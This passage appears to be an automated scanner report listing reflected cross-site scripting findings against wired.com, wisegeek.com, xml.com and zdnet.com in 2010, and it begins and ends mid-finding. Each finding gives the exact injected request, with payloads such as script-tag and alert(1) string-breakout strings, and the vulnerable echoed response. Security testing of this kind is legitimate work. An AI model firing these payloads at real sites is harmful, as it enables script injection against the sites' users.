The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c4df0"><a>0915993bba4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /wired/issue/17-08c4df0"><a>0915993bba4 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29352
Vary: Accept-Encoding
Cache-Control: max-age=220
Expires: Mon, 22 Nov 2010 01:06:32 GMT
Date: Mon, 22 Nov 2010 01:02:52 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_wired ss_issue c_17-08c4df0"><a>0915993bba4">
...[SNIP]...

1.1381. http://www.wired.com/wired/issue/17-09 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /wired/issue/17-09

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2f377"><a>a70e93eb2b8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /wired/issue2f377"><a>a70e93eb2b8/17-09 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29352
Vary: Accept-Encoding
Cache-Control: max-age=217
Expires: Mon, 22 Nov 2010 01:05:19 GMT
Date: Mon, 22 Nov 2010 01:01:42 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_wired ss_issue2f377"><a>a70e93eb2b8 c_17-09">
...[SNIP]...

1.1382. http://www.wired.com/wired/issue/17-09 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /wired/issue/17-09

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f4579"><a>26cfdf967a3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /wired/issue/17-09f4579"><a>26cfdf967a3 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29352
Vary: Accept-Encoding
Cache-Control: max-age=238
Expires: Mon, 22 Nov 2010 01:06:33 GMT
Date: Mon, 22 Nov 2010 01:02:35 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_wired ss_issue c_17-09f4579"><a>26cfdf967a3">
...[SNIP]...

1.1383. http://www.wired.com/wired/issue/17-10 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /wired/issue/17-10

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 96633"><a>d97168b35a3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /wired/issue96633"><a>d97168b35a3/17-10 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29352
Vary: Accept-Encoding
Cache-Control: max-age=221
Expires: Mon, 22 Nov 2010 01:05:30 GMT
Date: Mon, 22 Nov 2010 01:01:49 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_wired ss_issue96633"><a>d97168b35a3 c_17-10">
...[SNIP]...

1.1384. http://www.wired.com/wired/issue/17-10 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /wired/issue/17-10

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 84a3a"><a>b28e513b893 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /wired/issue/17-1084a3a"><a>b28e513b893 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29352
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Mon, 22 Nov 2010 01:06:51 GMT
Date: Mon, 22 Nov 2010 01:02:51 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_wired ss_issue c_17-1084a3a"><a>b28e513b893">
...[SNIP]...

1.1385. http://www.wired.com/wired/issue/geekipedia [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /wired/issue/geekipedia

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4172"><a>ef04e99490a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /wired/issued4172"><a>ef04e99490a/geekipedia HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29362
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Mon, 22 Nov 2010 01:05:46 GMT
Date: Mon, 22 Nov 2010 01:01:46 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_wired ss_issued4172"><a>ef04e99490a c_geekipedia">
...[SNIP]...

1.1386. http://www.wired.com/wired/issue/geekipedia [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /wired/issue/geekipedia

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88d75"><a>742ed78951f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /wired/issue/geekipedia88d75"><a>742ed78951f HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29362
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Mon, 22 Nov 2010 01:06:56 GMT
Date: Mon, 22 Nov 2010 01:02:56 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_wired ss_issue c_geekipedia88d75"><a>742ed78951f">
...[SNIP]...

1.1387. http://www.wired.com/wired/issue/test2007/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /wired/issue/test2007/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a220"><a>e0ebb2c7f4b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /wired/issue8a220"><a>e0ebb2c7f4b/test2007/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29359
Vary: Accept-Encoding
Cache-Control: max-age=218
Expires: Mon, 22 Nov 2010 01:08:46 GMT
Date: Mon, 22 Nov 2010 01:05:08 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_wired ss_issue8a220"><a>e0ebb2c7f4b c_test2007">
...[SNIP]...

1.1388. http://www.wired.com/wired/issue/test2007/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /wired/issue/test2007/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c0cd5"><a>ead6bfc60a1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /wired/issue/test2007c0cd5"><a>ead6bfc60a1/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29359
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Mon, 22 Nov 2010 01:09:52 GMT
Date: Mon, 22 Nov 2010 01:05:52 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_wired ss_issue c_test2007c0cd5"><a>ead6bfc60a1">
...[SNIP]...

1.1389. http://www.wisegeek.com/who-is-ferdinand-marcos.htm [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wisegeek.com
Path:   /who-is-ferdinand-marcos.htm

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3c0b9'-alert(1)-'2c32b372f59 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /3c0b9'-alert(1)-'2c32b372f59 HTTP/1.1
Host: www.wisegeek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Sun, 21 Nov 2010 21:33:07 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny4 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g mod_perl/2.0.4 Perl/v5.10.0
X-Powered-By: PHP/5.2.6-1+lenny4
Set-Cookie: wsscfm=eJwr9kyxTUpONTBMM0wzNU1ONDMyskxONDY1T0s1sEi1MDcAsgHIxApK; path=/
Set-Cookie: ufd=eJwrSExPLctMLfcrzbU1VCspSkxLy0wOzi8tSk61zQcAp7ALGQ%3D%3D; path=/
Set-Cookie: tm=eJzLTLE1MjVUS7Y1AAAPjAKZ; expires=Sun, 05-Dec-2010 21:33:07 GMT; path=/
Cache-Control: no-cache, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 9120

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<link rel="stylesheet" type="text/css" href="http://fonts.googleapis.com/css?family=Nobile:i,bi">
<link rel="stylesh
...[SNIP]...
<script>
var _gaq = _gaq || [];
_gaq.push(['_setAccount', 'UA-176713-1']);
_gaq.push(['_trackPageview', '/404.htm?page=/3c0b9'-alert(1)-'2c32b372f59']);

(function() {
var ga = document.createElement('script');
ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
ga.setAttribute('a
...[SNIP]...

1.1390. http://www.wisegeek.com/who-is-ferdinand-marcos.htm [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wisegeek.com
Path:   /who-is-ferdinand-marcos.htm

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6f77e"-alert(1)-"41fff1b4500 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /who-is-ferdinand-marcos.htm?6f77e"-alert(1)-"41fff1b4500=1 HTTP/1.1
Host: www.wisegeek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 21 Nov 2010 21:33:05 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny4 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g mod_perl/2.0.4 Perl/v5.10.0
X-Powered-By: PHP/5.2.6-1+lenny4
Set-Cookie: wsscfm=eJwr9kyxNTEzNDAyT0wzMTNONDQ1TjNNTTRLSTRKSkpKMUtKMkwEALsKCpQ%3D; path=/
Set-Cookie: ufd=eJwrSExPLctMLfcrzbU1VCspSkxLy0wOzi8tSk61zQcAp7ALGQ%3D%3D; path=/
Set-Cookie: tm=eJzLTLE1MjVUS7a1BAAPlQKi; expires=Sun, 05-Dec-2010 21:33:05 GMT; path=/
Set-Cookie: i=world-1.gif
Set-Cookie: c41=eJzLTLE1MjRRS7Y1NgEAElUCzw%3D%3D; expires=Sun, 05-Dec-2010 21:33:05 GMT; path=/
Set-Cookie: ufd=eJxNybEKgCAURuG3cQsy7ULDP7W39AQi1xIqQ61ev0lxOx%2FnNhu%2Fnr%2FlOSFFjsY5b9fwRMsIIqd5N9fFB0icnKO3SfVNE%2BRQQJhKagVdW6OTFWMzCIMqkAQ1%2FZw2L5Y%3D; path=/
Cache-Control: no-cache, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 32461

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Who is Ferdinand Marcos?</title> <link rel="stylesheet" type="text/css" href="http://fonts.googleapis.com/css?fa
...[SNIP]...
<script>
var artId = 39260;
var tpl = "repeating-link-units-in-discussions";
var plId = "1290375185.7.6972";
var artUrl = "/who-is-ferdinand-marcos.htm?6f77e"-alert(1)-"41fff1b4500=1";
</script>
...[SNIP]...

1.1391. http://www.wisegeek.com/who-is-ferdinand-marcos.htm [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wisegeek.com
Path:   /who-is-ferdinand-marcos.htm

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fa863'-alert(1)-'74b896c2ec8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /who-is-ferdinand-marcos.htm?fa863'-alert(1)-'74b896c2ec8=1 HTTP/1.1
Host: www.wisegeek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 21 Nov 2010 21:33:06 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny4 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g mod_perl/2.0.4 Perl/v5.10.0
X-Powered-By: PHP/5.2.6-1+lenny4
Set-Cookie: wsscfm=eJwr9kyxNTVISklLMzIzt0wySjQ0tjC3SDJNSzE1TUs2MEgyNjYBAMK%2BCh0%3D; path=/
Set-Cookie: ufd=eJwrSExPLctMLfcrzbU1VCspSkxLy0wOzi8tSk61zQcAp7ALGQ%3D%3D; path=/
Set-Cookie: tm=eJzLTLE1MjVUS7Y1AAAPjAKZ; expires=Sun, 05-Dec-2010 21:33:06 GMT; path=/
Set-Cookie: i=world-1.gif
Set-Cookie: c41=eJzLTLE1MjRRS7Y1tgAAElkC0w%3D%3D; expires=Sun, 05-Dec-2010 21:33:06 GMT; path=/
Set-Cookie: ufd=eJwrSExPLctMLfcrzbU1VCspSkxLy0wOzi8tSk61zVcrKXbOSMzLS82xNVPLTS0pykwuNjZAYpvZGhrBOGa2BjCmibGtCZxtYqtrCOeYIkmY2RoZwziGZrbGlgCZ9i%2BN; path=/
Cache-Control: no-cache, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 31478

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Who is Ferdinand Marcos?</title> <link rel="stylesheet" type="text/css" href="http://fonts.googleapis.com/css?fa
...[SNIP]...
rrow_id","discussionPostBoxHolder":"PageArticle-discussionPostBoxHolder_id"},"_actions":{"getDiscussionPostBoxJSON":"action[PageArticle:getDiscussionPostBoxJSON]"},"url":"\/who-is-ferdinand-marcos.htm?fa863'-alert(1)-'74b896c2ec8=1","postSuccessfull":false,"postError":false,"scrollToPostBox":null,"__id":"78daddf3385d741984006df22c09f954","__name":"PageArticle","__childControls":[],"__parentControlId":null}); ');c.addControl(id
...[SNIP]...

1.1392. http://www.xml.com/pub/a/2003/07/23/extendingrss.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.xml.com
Path:   /pub/a/2003/07/23/extendingrss.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 982b9"><script>alert(1)</script>009fb2a3c4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pub/a/2003/07/23/extendingrss.html?982b9"><script>alert(1)</script>009fb2a3c4=1 HTTP/1.1
Host: www.xml.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:32:28 GMT
Server: Apache
P3P: policyref="http://www.oreillynet.com/w3c/p3p.xml",CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa CONo OUR DELa PUBi OTRa IND PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
Content-Type: text/html; charset=ISO-8859-1
Connection: close
Content-Length: 48244


<?xml version "1.0" encoding "UTF-8"?>

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/transitional.dtd">
<html xmlns="http://www.w3.org/1999
...[SNIP]...
<a href="http://www.oreilly.com/catalog/syndicationfeeds/?CMP=ILC-KC2876097557&ATT=http://www.xml.com/pub/a/2003/07/23/extendingrss.html?982b9"><script>alert(1)</script>009fb2a3c4=1">
...[SNIP]...

1.1393. http://www.xml.com/pub/a/2003/07/23/extendingrss.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.xml.com
Path:   /pub/a/2003/07/23/extendingrss.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 99584--><script>alert(1)</script>0a38ce97934 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /pub/a/2003/07/23/extendingrss.html?99584--><script>alert(1)</script>0a38ce97934=1 HTTP/1.1
Host: www.xml.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:32:31 GMT
Server: Apache
P3P: policyref="http://www.oreillynet.com/w3c/p3p.xml",CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa CONo OUR DELa PUBi OTRa IND PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
Content-Type: text/html; charset=ISO-8859-1
Connection: close
Content-Length: 48475


<?xml version "1.0" encoding "UTF-8"?>

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/transitional.dtd">
<html xmlns="http://www.w3.org/1999
...[SNIP]...
<a href="/cs/user/login?x-redirect=http://www.xml.com/pub/a/2003/07/23/extendingrss.html?99584--><script>alert(1)</script>0a38ce97934=1">
...[SNIP]...

1.1394. http://www.zdnet.com/blog/computers/micro-center-beats-intels-deal-offers-its-64gb-ssd-for-just-9999-/4283 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.zdnet.com
Path:   /blog/computers/micro-center-beats-intels-deal-offers-its-64gb-ssd-for-just-9999-/4283

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d10a9'%3bdf7c136c81d was submitted in the REST URL parameter 4. This input was echoed as d10a9';df7c136c81d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blog/computers/micro-center-beats-intels-deal-offers-its-64gb-ssd-for-just-9999-/4283d10a9'%3bdf7c136c81d HTTP/1.1
Host: www.zdnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:36:45 GMT
Server: Apache
